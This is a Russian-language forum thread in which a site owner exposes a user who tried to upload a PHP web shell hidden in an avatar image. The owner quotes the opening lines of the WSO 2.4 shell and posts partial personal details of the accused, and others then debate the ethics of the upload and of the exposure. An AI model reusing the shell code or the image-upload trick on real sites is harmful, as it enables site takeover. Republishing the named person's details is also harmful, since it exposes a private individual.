RabbeN (заливщик шеллов!)ВНИМАНИЕ!

Внимание всем! Будьте бдительны!
Только что один из моих скриптов выловил на моем сайте заливщика шеллов.
Им оказался Rabben
IP: ****
Email: RabbeN[]tut.by
Провайдер: BELTELECOM
Расположение: *****
ВКонтакте:http://vkontakte.ru/****

Данный господин пытался залить шелл через аватару,а именно,поместив вредоносный код в изображение с аватарой.

Выкладываю часть вредоносного кода,который находился в аватаре:

Code:

$auth_pass = "63a9f0ea7bb98050796b649e85481845";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@session_start();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.4');

Данное действие можно расценить как потенциальный взлом сайта и передать данные в соответствующие органы.

БУДЬТЕ БДИТЕЛЬНЫ!

Пытался, но не смог

Мне не важно,смог ты или нет. Но сам факт имел место быть.Благо что у меня стоит защита от этого и скрипт автоматического распознования шеллов. Нет никакой уверенности,что от твоих таких деяний не пострадают сайты новичков,которые еще неуверенно себя чувствуют в программировании.
Так что всем остальным советую добавить IP **** в список нечести.

чего с ним парится то?
таких как он прудь пруди в сети
данный типаж безработных мне знаком, который что ни есть в поисках навредить от безделья (и тоже не в силах)
1 - грепануть его тут по фаерволу
2 - найти его аккаунт на фрилансе и написать администрации, или оставить ему заявочку в арбитраже , пусть видят что данный чел мошенник!

1. На фрилансе не тусуюсь(сам не программист, больше подхожу под тестера)
2. Ни одному порталу еще не навредил. Да, 1 портал попался, на этот баг, но администратору уведомил про баг.
3. Смысл банить по ip, если есть тьма аномайзеров?
4. Я невыкидываю баг в паблик...

Во первых начнем с того,что это не баг. Это просто обычное переименование php-файла в jpg и соответсвенно загрузка этой самой jpg в аватару. Могу сказать только одно: Что таким образом переименованый файл ты никогда не запустишь на сервере без определенных знаний.В сущности,любой php файл можно переименовать в jpg и загружать на любой сайт.Вопрос в том,будет ли это работать. Но меня просто удивило то, что всякие школьники,начитавшись Античата,так и наровят себя возомнить КулХацкерами, при этом не имея за спиной профессиональных знаний хотя бы даже того самого php и совершенно не имея представления о том, какие директивы и защита стоят на сервере, а также,что самое главное, совершенно не имея представления НА КОГО ОНИ МОГУТ НАРВАТЬСЯ!!! На этом форуме были уже такие случаи и многие помнят...
Так что мой тебе совет, вместо того чтоб херней страдать,лучше бы делом занимался и учил программирование.

Еще раз убеждаюсь в том,что ты просто делитант. В наше время можно и через прокси вход закрыть...

бета тестер из тебя тоже хреновый!

аномайзер - затруднит твою беспонтовые похождения на проектах где ты забаненн

ты баг и не нашел, так что не льсти себе!

Совершенно справидливо.

В точности также как и :

Неужели??? Каким образом и где ты меня уведомил??? Как только ты зарегился и вошел на сайт, имея заместо аватарки вредоносный код, то тебя скрипт автоматом сразу и забанил, о чем я получил уведомление о загрузки вредоносного кода.

Ладно, просто в будущем подумай, стоит ли кому-нибудь такие гадости делать. Иначе для тебя самого же это может боком выйти.

Я и не спорю

Затруднит, но не намного.

Как скажешь, бро.

Я не писал, что я тебе уведомлял. На твоём сайте он даже не сработал.

По каким критериям, ты выяснил, что я тебе гадости делал?

Думайте головой перед тем как выкладывать чьи то данные (от айпи до котакта или телефона).
Вышеуказанный юзер ничего плохого сайту не сделал (и не факт, что сделал бы). А может и решил потратить свое свободное время на то, чтобы проверить ваши мегапорталы на уязвимости и в случае обнаружения сообщить незадачливым админам.
Я кстати так тоже зачастую делаю. Правда в основном на сайтах клиентов или местной деме когда она была. Случайно вижу код, в котором можно найти уязвимость. Захожу на чей то сайт. И проверяю. Правда не находил ни разу.
А вы по сути выкладываете контакты человека за то, что он не сделал ничего плохого и вам кажется, что он собирался это делать.